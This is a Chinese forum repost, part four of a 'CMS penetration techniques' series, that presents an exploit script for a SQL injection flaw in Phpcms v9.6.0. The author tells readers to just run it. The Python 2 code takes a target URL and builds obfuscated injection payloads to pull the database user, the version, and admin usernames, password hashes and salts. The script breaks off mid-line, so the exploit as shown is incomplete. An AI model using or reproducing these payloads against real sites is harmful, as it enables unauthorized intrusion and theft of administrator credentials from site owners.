cms渗透姿势合集第四篇-phpcms**

2018-3-30 13:00 |来自: 互联网 472 0

摘要: 昨天朋友圈一直在传phpcms的最新注入漏洞，今天老夫也发一发。说明：是从边界安全的公众号看到的。思路：直接上exp即可下附EXP： import requests,sys,urlliburl = sys.argvprint 'Phpcms v9.6.0 SQLi Exploit ...

昨天朋友圈一直在传phpcms的最新注入漏洞，今天老夫也发一发。

说明：是从边界安全的公众号看到的。

思路：直接上exp即可

下附EXP：

import requests,sys,urllib
url = sys.argv[1]
print 'Phpcms v9.6.0 SQLi Exploit Code By Luan'
sqli_prefix = '%*27an*d '
sqli_info = 'e*xp(~(se*lect%*2af*rom(se*lect co*ncat(0x6c75616e24,us*er(),0x3a,ver*sion(),0x6c75616e24))x))'
sqli_password1 = 'e*xp(~(se*lect%*2afro*m(sel*ect co*ncat(0x6c75616e24,username,0x3a,password,0x3a,encrypt,0x6c75616e24) fr*om '
sqli_password2 = '_admin li*mit 0,1)x))'
sqli_padding = '#

声明：文章版权归原作者所有部分文章转自互联网如有侵权请联系 [邮箱地址] 删除

路过

雷人

握手

鲜花

鸡蛋

收藏分享邀请

上一篇：住范儿招聘PHP工程师、客户经理及供应链经理助理！坐标北京下一篇：程序员该如何维护健康的人际关系？

cms渗透姿势合集第四篇-phpcms**

相关分类